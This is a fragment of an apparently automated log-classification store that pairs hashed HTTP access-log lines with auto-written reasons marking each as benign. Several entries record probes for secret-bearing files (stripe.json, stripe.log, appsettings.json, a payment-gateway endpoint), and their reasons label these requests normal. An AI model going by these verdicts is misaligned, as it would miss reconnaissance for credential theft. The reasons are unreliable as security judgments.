"\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.623 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:45.838685386Z" }, "9f406189ca350da4e431c247b0e7f4745c5f20b6ef7831e7eecc1e3824b82c3b": { "type": "hash", "value": "9f406189ca350da4e431c247b0e7f4745c5f20b6ef7831e7eecc1e3824b82c3b", "source": "auto", "reason": "Routine HTTP GET request to an API logs endpoint returning status 304 (not modified), with typical timing information.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 26.313 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:46.323403249Z" }, "9f4b4fcff746c25ea4b0cc904f54d81b26210aec8be602678750cf3acf02b6e8": { "type": "hash", "value": "9f4b4fcff746c25ea4b0cc904f54d81b26210aec8be602678750cf3acf02b6e8", "source": "auto", "reason": "HTTP GET request to an API endpoint returning 304 (not modified) with a short response time appears to be normal application traffic.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 2.215 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:24.556974299Z" }, "9fe3d654d470aa3b4f4749a694c551dd9f29c54e8ce0556be97c81baee6ead3e": { "type": "hash", "value": "9fe3d654d470aa3b4f4749a694c551dd9f29c54e8ce0556be97c81baee6ead3e", "source": "auto", "reason": "Routine HTTP GET request to an internal API endpoint returning 304 (not modified); appears normal application traffic.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.495 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:24:42.683352921Z" }, "9ff1dcecacd8676c1bb8ab56f3ffb0ffc36b7f88c9f8cd5e1b3a2ee2c5978fea": { "type": "hash", "value": "9ff1dcecacd8676c1bb8ab56f3ffb0ffc36b7f88c9f8cd5e1b3a2ee2c5978fea", "source": "auto", "reason": "Normal HTTP GET request for a config/resource returning 404; typical web access pattern with no clear malicious indicators.", "original_line": "\u001b[0mGET /config/stripe.json \u001b[33m404\u001b[\u003cDUR\u003e 0.536 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:29:12.15369089Z" }, "a060d23beb1f94ba7fd6af865f5a50978845c0aaf108f8ab12f89f4e9ac567d4": { "type": "hash", "value": "a060d23beb1f94ba7fd6af865f5a50978845c0aaf108f8ab12f89f4e9ac567d4", "source": "auto", "reason": "HTTP GET to an internal API endpoint returning 304 (not modified) with a typical latency; looks like routine reverse-proxy/app access logging.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.871 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:51.616096206Z" }, "a164fb6e5c473422221caff2d76ecbd3d24ce5d1f11510734fcd672af89f598e": { "type": "hash", "value": "a164fb6e5c473422221caff2d76ecbd3d24ce5d1f11510734fcd672af89f598e", "source": "auto", "reason": "Appears to be a normal HTTP GET to an application logs endpoint with a 304 Not Modified response and a sub-30ms latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.727 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:09.979752582Z" }, "a19e3eb906a1fced9bffeac94d4f78b3bc293e4cfa5f675d803d7560088c24a1": { "type": "hash", "value": "a19e3eb906a1fced9bffeac94d4f78b3bc293e4cfa5f675d803d7560088c24a1", "source": "auto", "reason": "Regular HTTP 404 response for an asset/endpoint; not indicative of an attack or misconfiguration on its own.", "original_line": "\u001b[0mGET /plans \u001b[33m404\u001b[\u003cDUR\u003e 1.295 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:10:43.54473683Z" }, "a2252699a48399fc2011a961550def952881c3422969c1789335a4ce3e1d3ccc": { "type": "hash", "value": "a2252699a48399fc2011a961550def952881c3422969c1789335a4ce3e1d3ccc", "source": "auto", "reason": "Routine HTTP GET request returning 304 (not modified) with a typical small response and latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.331 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:39.948884545Z" }, "a2b27d09cd0e49ae002aa26b8bbceff230bbaf46ea93cbc83ab79cf117e164d3": { "type": "hash", "value": "a2b27d09cd0e49ae002aa26b8bbceff230bbaf46ea93cbc83ab79cf117e164d3", "source": "auto", "reason": "Routine HTTP GET request to an application API endpoint returning 304 (not modified), with typical timing and no error indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.615 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:57.843284801Z" }, "a2bbc3df9488e38bc8a3e34d40794999e6aa0f7e1d3fe9ce22fac4786675a493": { "type": "hash", "value": "a2bbc3df9488e38bc8a3e34d40794999e6aa0f7e1d3fe9ce22fac4786675a493", "source": "auto", "reason": "Normal HTTP request returning 404 for a specific resource; no signs of attack.", "original_line": "\u001b[0mGET /stripe.log \u001b[33m404\u001b[\u003cDUR\u003e 0.830 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:28:12.00715166Z" }, "a2e7e581ccc2478d27440675ef9a84334f06483734d8d459f2933e48cd17b8b8": { "type": "hash", "value": "a2e7e581ccc2478d27440675ef9a84334f06483734d8d459f2933e48cd17b8b8", "source": "auto", "reason": "Looks like a routine authenticated API GET request returning HTTP 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.452 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:21.757373655Z" }, "a41107265fb299b4bb86590367298b2eff96f8448702b8b80ba3233df1915bad": { "type": "hash", "value": "a41107265fb299b4bb86590367298b2eff96f8448702b8b80ba3233df1915bad", "source": "auto", "reason": "Appears to be a normal HTTP GET request to an application logs endpoint returning 304 (not modified) with a small latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.263 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:48.742842076Z" }, "a42f2d01ef413ace3a7e39a8439d7c78450ec0b7a70a0bf3cc0771f458091728": { "type": "hash", "value": "a42f2d01ef413ace3a7e39a8439d7c78450ec0b7a70a0bf3cc0771f458091728", "source": "auto", "reason": "Normal API GET request to /api/v1/settings with typical 200 response", "original_line": "\u001b[0mGET /api/v1/settings \u001b[32m200\u001b[\u003cDUR\u003e 0.530 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:30:46.557272145Z" }, "a813117576e56bbfefd92c046f8adfd42c8d5e01abe525baf8828c6b19b8fc01": { "type": "hash", "value": "a813117576e56bbfefd92c046f8adfd42c8d5e01abe525baf8828c6b19b8fc01", "source": "auto", "reason": "Appears to be a normal HTTP GET request to an application logs endpoint with a successful 304 status; typical of routine client polling/caching.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.028 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:12.62866811Z" }, "a89bebcdfd7609deb99d4056d85f34332113ee4759d6b90728445609b4f0a662": { "type": "hash", "value": "a89bebcdfd7609deb99d4056d85f34332113ee4759d6b90728445609b4f0a662", "source": "auto", "reason": "Looks like a normal HTTP GET to an application API endpoint returning 304 (not modified) with typical latency logging from a containerized service.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.407 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:48.812560639Z" }, "a8bc89e5457ebc8a908bc722a8fec2a4511191a9de177054ac25c72dcac05a70": { "type": "hash", "value": "a8bc89e5457ebc8a908bc722a8fec2a4511191a9de177054ac25c72dcac05a70", "source": "auto", "reason": "A routine API GET request returning HTTP 200 with a small response size and measurable duration; appears normal operational traffic.", "original_line": "\u001b[0mGET /api/v2/theme/current \u001b[32m200\u001b[\u003cDUR\u003e 7.394 ms - 68\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T10:32:53.897905069Z" }, "a928c7d96d0790c80a30fa1960c088bc50c2f78f1c8240e22d8ee43c1bad5900": { "type": "hash", "value": "a928c7d96d0790c80a30fa1960c088bc50c2f78f1c8240e22d8ee43c1bad5900", "source": "auto", "reason": "Appears to be a normal HTTP GET request to an API endpoint returning status 304 (not modified) with a small latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.411 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:42.833851727Z" }, "a9442e3b1258376dfd263d1dd7a8842f27f4c645ff6d607f3691b9b1c9e0d89c": { "type": "hash", "value": "a9442e3b1258376dfd263d1dd7a8842f27f4c645ff6d607f3691b9b1c9e0d89c", "source": "auto", "reason": "Routine HTTP GET to an API logs endpoint returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.756 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:06.665330773Z" }, "a94bab22dd3fada6dcac581755d6de2245d9bd0fcbf63a1d2b593ff97a074da8": { "type": "hash", "value": "a94bab22dd3fada6dcac581755d6de2245d9bd0fcbf63a1d2b593ff97a074da8", "source": "auto", "reason": "Looks like a normal HTTP GET request to an internal API logs endpoint with a 304 response and a duration value.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.376 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:28.09523442Z" }, "aa6cf9f268b36c1fd0760f2665d112d020af733f949676e09add960524c7e5bd": { "type": "hash", "value": "aa6cf9f268b36c1fd0760f2665d112d020af733f949676e09add960524c7e5bd", "source": "auto", "reason": "HTTP GET to a versioned API endpoint with a 304 status and a short request duration appears to be normal client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 18.986 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:33.835344592Z" }, "aa82fa927bbb165f4e0ec113753d5c287863db9c186a066db61b40ab6f9995b1": { "type": "hash", "value": "aa82fa927bbb165f4e0ec113753d5c287863db9c186a066db61b40ab6f9995b1", "source": "auto", "reason": "Normal HTTP 404 for a static asset (constants.js) with a small response time; typical in web services.", "original_line": "\u001b[0mGET /constants.js \u001b[33m404\u001b[\u003cDUR\u003e 1.704 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:24:52.10475068Z" }, "aa91016a3457796f7ac0b5338b3b3958c635e2eda7f6ef8cfc84a1d0a58ec367": { "type": "hash", "value": "aa91016a3457796f7ac0b5338b3b3958c635e2eda7f6ef8cfc84a1d0a58ec367", "source": "auto", "reason": "HTTP GET request returning 304 (Not Modified) with a normal sub-3ms response time looks like routine API caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 2.189 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:24.775656108Z" }, "ab3d34b3f55b5c1ce0a8c9e7fd95e3acda08133aa94c24579b47c7194bac62bb": { "type": "hash", "value": "ab3d34b3f55b5c1ce0a8c9e7fd95e3acda08133aa94c24579b47c7194bac62bb", "source": "auto", "reason": "Routine HTTP GET request to an application API returning 200, with typical latency and byte count.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[32m200\u001b[\u003cDUR\u003e 20.551 ms - \u003cNUM\u003e\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:57.99044625Z" }, "ab67ff33b2bf42030bc01cef6ca5bebac5b1299ea88808f69502c46a4e48960e": { "type": "hash", "value": "ab67ff33b2bf42030bc01cef6ca5bebac5b1299ea88808f69502c46a4e48960e", "source": "auto", "reason": "Normal HTTP 404 for a missing appsettings.json file; likely a probing but not inherently malicious.", "original_line": "\u001b[0mGET /appsettings.json \u001b[33m404\u001b[\u003cDUR\u003e 0.628 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:31:54.193846032Z" }, "aba0e48e94ecb87a91c55e72fe1dfffd12fffbc2239ce103147ccb004be34721": { "type": "hash", "value": "aba0e48e94ecb87a91c55e72fe1dfffd12fffbc2239ce103147ccb004be34721", "source": "auto", "reason": "Appears to be a normal HTTP GET request to an application log retrieval endpoint with a 304 response and a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.472 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:09.695015834Z" }, "ac03d7345e3173a5f88641e5fcf9a054eedd70da3e05b54210b1d9d16a39c5fa": { "type": "hash", "value": "ac03d7345e3173a5f88641e5fcf9a054eedd70da3e05b54210b1d9d16a39c5fa", "source": "auto", "reason": "Routine HTTP GET request to an application API endpoint returning 304 (not modified) with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.983 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:45.843810769Z" }, "acdda14e44cc70e1738999218a3d4ec7be9ad69f9161cc64c5e62f2ec6df84b2": { "type": "hash", "value": "acdda14e44cc70e1738999218a3d4ec7be9ad69f9161cc64c5e62f2ec6df84b2", "source": "auto", "reason": "Looks like a routine authenticated API GET request returning HTTP 304 (Not Modified) with a typical response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 30.691 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:03.772624328Z" }, "acfe9367879f293adb3adc283f6a3aed324de62e7395a941bd7214351d29acdc": { "type": "hash", "value": "acfe9367879f293adb3adc283f6a3aed324de62e7395a941bd7214351d29acdc", "source": "auto", "reason": "Docker service is emitting a routine HTTP GET for application logs that returns 304 (Not Modified) with a measured response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.263 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:51.922879621Z" }, "ad64b94acd45d70138b0218b0b3fb4b532d602aa5451c6232c157e4bc8aca280": { "type": "hash", "value": "ad64b94acd45d70138b0218b0b3fb4b532d602aa5451c6232c157e4bc8aca280", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint with a 304 (not modified) response and normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.535 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:39.822268668Z" }, "ad6c342d010ab91701094c81a1c03ca2f8b13866da51037d3d44fe526bc52e6b": { "type": "hash", "value": "ad6c342d010ab91701094c81a1c03ca2f8b13866da51037d3d44fe526bc52e6b", "source": "auto", "reason": "Normal HTTP 200 response from a GET request; no anomalies detected.", "original_line": "\u001b[0mGET / \u001b[32m200\u001b[\u003cDUR\u003e 0.758 ms - 978\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T13:12:33.982549531Z" }, "adec656382f2417a48a8a734c5438ae05f74ce68f0577c6eb6d8f2309274d22c": { "type": "hash", "value": "adec656382f2417a48a8a734c5438ae05f74ce68f0577c6eb6d8f2309274d22c", "source": "auto", "reason": "HTTP GET to a logs endpoint returning 304 (not modified) with a short duration; typical application behavior for caching/polling.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 26.192 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:36.749633599Z" }, "ae77cc987ae4fcad1ac31dd2a299e591cbdc8f511427040598c1ff008f989c46": { "type": "hash", "value": "ae77cc987ae4fcad1ac31dd2a299e591cbdc8f511427040598c1ff008f989c46", "source": "auto", "reason": "Normal HTTP 404 response for a GET request to /account with a small response time; no signs of abuse detected", "original_line": "\u001b[0mGET /account \u001b[33m404\u001b[\u003cDUR\u003e 0.708 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:18:37.774380538Z" }, "ae7bfd76be37de8b5399c308857450fae71efc9e43887696b90e22ff58c1070d": { "type": "hash", "value": "ae7bfd76be37de8b5399c308857450fae71efc9e43887696b90e22ff58c1070d", "source": "auto", "reason": "HTTP GET to an API endpoint returning 304 (not modified) with a low response time appears to be normal application traffic/keep-alive caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 1.987 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:24.865182542Z" }, "af4ea63a23f3286c135997a719e12d57fbf27997117643b31bc70460d05580f6": { "type": "hash", "value": "af4ea63a23f3286c135997a719e12d57fbf27997117643b31bc70460d05580f6", "source": "auto", "reason": "Routine HTTP GET returning 304 Not Modified with a normal low latency; no clear attack indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.006 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:30.827519534Z" }, "b01538b5721671108bf254ea022fc6920b1f1ec81a037b7f6396fb91939c9e50": { "type": "hash", "value": "b01538b5721671108bf254ea022fc6920b1f1ec81a037b7f6396fb91939c9e50", "source": "auto", "reason": "Looks like a normal HTTP GET request to an application logs endpoint with a 304 response and sub-50ms latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 39.909 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:03.794976364Z" }, "b08a378adffe86ee562c0a4de8d7a959b2ffd176ce45758acf412a0d22a556b4": { "type": "hash", "value": "b08a378adffe86ee562c0a4de8d7a959b2ffd176ce45758acf412a0d22a556b4", "source": "auto", "reason": "HTTP GET request to an application API returning 304 (Not Modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.166 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:42.854251876Z" }, "b0cde0538e7966fa4df5818bbfd982ee7fddd4cfa40a930d6992e8ce95afe937": { "type": "hash", "value": "b0cde0538e7966fa4df5818bbfd982ee7fddd4cfa40a930d6992e8ce95afe937", "source": "auto", "reason": "Standard 404 GET request to a static asset; normal web server access log activity.", "original_line": "\u001b[0mGET /asset-manifest.json.map \u001b[33m404\u001b[\u003cDUR\u003e 0.650 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:26:40.854010661Z" }, "b152bca7b851ed42b7e20876efcb5a663a9cb9ffe1fce41e0591710d46c8f78b": { "type": "hash", "value": "b152bca7b851ed42b7e20876efcb5a663a9cb9ffe1fce41e0591710d46c8f78b", "source": "auto", "reason": "Routine HTTP GET request from an API returning status 304 with a measurable latency; no clear exploit or auth failure indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 33.566 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:16.08280565Z" }, "b22d0b7009c7615c8679146f00f6d55e12cf400f202671e598a1239d9045d68d": { "type": "hash", "value": "b22d0b7009c7615c8679146f00f6d55e12cf400f202671e598a1239d9045d68d", "source": "auto", "reason": "Looks like a routine HTTP GET access log returning 304 (Not Modified) with a small response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 1.852 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:24.527360506Z" }, "b267c4de8833c993411ca484cb3be305eeec6ecfaea1e3ef15b87daf8e96f04a": { "type": "hash", "value": "b267c4de8833c993411ca484cb3be305eeec6ecfaea1e3ef15b87daf8e96f04a", "source": "auto", "reason": "Routine authenticated HTTP GET to an application logs endpoint returning 200 with latency and response size.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[32m200\u001b[\u003cDUR\u003e 45.890 ms - \u003cNUM\u003e\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:06.903086561Z" }, "b282b99b68ce9aa01f58466859b8f82bbf455ee6099bb971bf88ca5eba9295ef": { "type": "hash", "value": "b282b99b68ce9aa01f58466859b8f82bbf455ee6099bb971bf88ca5eba9295ef", "source": "auto", "reason": "Normal HTTP GET request to root with 200 status and small duration; no anomalous content", "original_line": "\u001b[0mGET / \u001b[32m200\u001b[\u003cDUR\u003e 0.718 ms - 978\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T13:19:10.599643943Z" }, "b30668943de13d7fdc6b122ac1507eb810cf9252c8ed501fd646075927cceb0d": { "type": "hash", "value": "b30668943de13d7fdc6b122ac1507eb810cf9252c8ed501fd646075927cceb0d", "source": "auto", "reason": "Normal asset request resulting in 404; no evidence of attack or misbehavior.", "original_line": "\u001b[0mGET /vendor.js \u001b[33m404\u001b[\u003cDUR\u003e 0.610 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:25:30.519486449Z" }, "b3b2c30ba6a7c7709137dc502b76f65d7fffe30108047235a74cf1da70ce158a": { "type": "hash", "value": "b3b2c30ba6a7c7709137dc502b76f65d7fffe30108047235a74cf1da70ce158a", "source": "auto", "reason": "Normal static asset delivery with HTTP 200 success", "original_line": "\u001b[0mGET /static/js/main.ecef38b1.js \u001b[32m200\u001b[\u003cDUR\u003e 0.762 ms - \u003cNUM\u003e\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T13:12:40.410880436Z" }, "b434d0ef2e62604d0ecae071fe3e9cb34f52f69c775c5fb0e8c9f7c921f62abd": { "type": "hash", "value": "b434d0ef2e62604d0ecae071fe3e9cb34f52f69c775c5fb0e8c9f7c921f62abd", "source": "auto", "reason": "Looks like a normal HTTP GET request to an application logs endpoint with a 304 status and a request duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.830 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:39.61808859Z" }, "b61a0972673923865d509a7923a99dadaf089cf5516946c03565c53f648d5327": { "type": "hash", "value": "b61a0972673923865d509a7923a99dadaf089cf5516946c03565c53f648d5327", "source": "auto", "reason": "Routine HTTP GET request returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.374 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:00.585606175Z" }, "b6b06efadeba7ce49d2f0c7368ce094c113c2d7da2f41132732164813259a43d": { "type": "hash", "value": "b6b06efadeba7ce49d2f0c7368ce094c113c2d7da2f41132732164813259a43d", "source": "auto", "reason": "Routine asset fetch (HTTP 200) for a manifest file, typical web service request.", "original_line": "\u001b[0mGET /asset-manifest.json \u001b[32m200\u001b[\u003cDUR\u003e 2.525 ms - 369\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:26:00.411064524Z" }, "b721d7af4e430968c8a67a527c2bdaa432720a18d576c52275084f706f800202": { "type": "hash", "value": "b721d7af4e430968c8a67a527c2bdaa432720a18d576c52275084f706f800202", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint with a normal 304 status and a measured response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 34.733 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:03.744186125Z" }, "b85dcd0a83de3c83e762ac5180f2a18839b06f2eaf37864b03bb4f669a50fb65": { "type": "hash", "value": "b85dcd0a83de3c83e762ac5180f2a18839b06f2eaf37864b03bb4f669a50fb65", "source": "auto", "reason": "HTTP GET to an application logs endpoint returning 304 (not modified) with a normal request duration; appears routine for a client polling/refreshing logs.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.665 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:09.646817447Z" }, "b895f04dc61dd8e191edc8c17c0ade9669b8b9794e5d2f89455dde9a27dd3793": { "type": "hash", "value": "b895f04dc61dd8e191edc8c17c0ade9669b8b9794e5d2f89455dde9a27dd3793", "source": "auto", "reason": "Standard HTTP request log with a 404 response; nothing indicates malicious activity.", "original_line": "\u001b[0mGET /stripe.json \u001b[33m404\u001b[\u003cDUR\u003e 1.054 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:28:08.021843685Z" }, "b89cfa2a598c02cf1b0c5f0c3fee9efc4e12bc180beb67a0eaa72804f877f001": { "type": "hash", "value": "b89cfa2a598c02cf1b0c5f0c3fee9efc4e12bc180beb67a0eaa72804f877f001", "source": "auto", "reason": "Normal web API request resulting in a 404; nothing indicates malicious activity. Regular client request to a WordPress WooCommerce endpoint.", "original_line": "\u001b[0mGET /wp-json/wc/v3/payment_gateways \u001b[33m404\u001b[\u003cDUR\u003e 0.678 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:27:17.191812114Z" }, "b960e3ae7300d819eac89eed905b536705f5041e00144a76e31a9f1f83c6b60f": { "type": "hash", "value": "b960e3ae7300d819eac89eed905b536705f5041e00144a76e31a9f1f83c6b60f", "source": "auto", "reason": "Routine HTTP request log to an application API with a 304 (not modified) response and sub-3ms latency; typical of normal client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 2.356 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:24.824595867Z" }, "b98b17683ed3d281abab36a0a6aaa6c125ea63d73f6a71afe3f6d19e32beaf57": { "type": "hash", "value": "b98b17683ed3d281abab36a0a6aaa6c125ea63d73f6a71afe3f6d19e32beaf57", "source": "auto", "reason": "Routine HTTP GET to an application API endpoint with a 304 status and typical response time; no exploit indicators present.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.408 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:22.037590464Z" }, "ba17cf0addc3535dd8d32b4cdbd6c39bf8f8a43c26df5568d6ad16c6f3630537": { "type": "hash", "value": "ba17cf0addc3535dd8d32b4cdbd6c39bf8f8a43c26df5568d6ad16c6f3630537", "source": "auto", "reason": "Appears to be a routine HTTP GET request to an application logs endpoint with a 304 response (not an error) and a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.645 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:57.785886259Z" }, "ba7f320bc2ffbe3f3040da4c9409d66ef055027c3a5daeed1c32ef6d9684137a": { "type": "hash", "value": "ba7f320bc2ffbe3f3040da4c9409d66ef055027c3a5daeed1c32ef6d9684137a", "source": "auto", "reason": "Normal HTTP request resulting in 404 for /cart; not indicative of malicious activity.", "original_line": "\u001b[0mGET /cart \u001b[33m404\u001b[\u003cDUR\u003e 0.589 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:11:02.951085808Z" }, "ba95a1e14f813a794c9cfeff08d6d2e5f82c26972862b210816ac430e267fe99": { "type": "hash", "value": "ba95a1e14f813a794c9cfeff08d6d2e5f82c26972862b210816ac430e267fe99", "source": "auto", "reason": "Routine HTTP GET request to an application API endpoint with a successful 304 status; typical container access log format.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.743 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:42.910566083Z" }, "bad8665e53cb24e9393e02c2d81fce4ed19d7eb4c6d33687ef4591f51a99a0a5": { "type": "hash", "value": "bad8665e53cb24e9393e02c2d81fce4ed19d7eb4c6d33687ef4591f51a99a0a5", "source": "auto", "reason": "Regular HTTP 404 for a known development client asset (/@vite/client) in a web app context; not indicative of attack", "original_line": "\u001b[0mGET /@vite/client \u001b[33m404\u001b[\u003cDUR\u003e 1.169 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:25:10.586688708Z" }, "bae8aadae3cca45334556f0f5071408f24e13fafaaeabe9d10a11bb7ccbe6698": { "type": "hash", "value": "bae8aadae3cca45334556f0f5071408f24e13fafaaeabe9d10a11bb7ccbe6698", "source": "auto", "reason": "Looks like a routine HTTP GET request returning 304 (not modified) with a typical small latency; likely an application health/cache interaction.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 28.013 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:45.834391392Z" 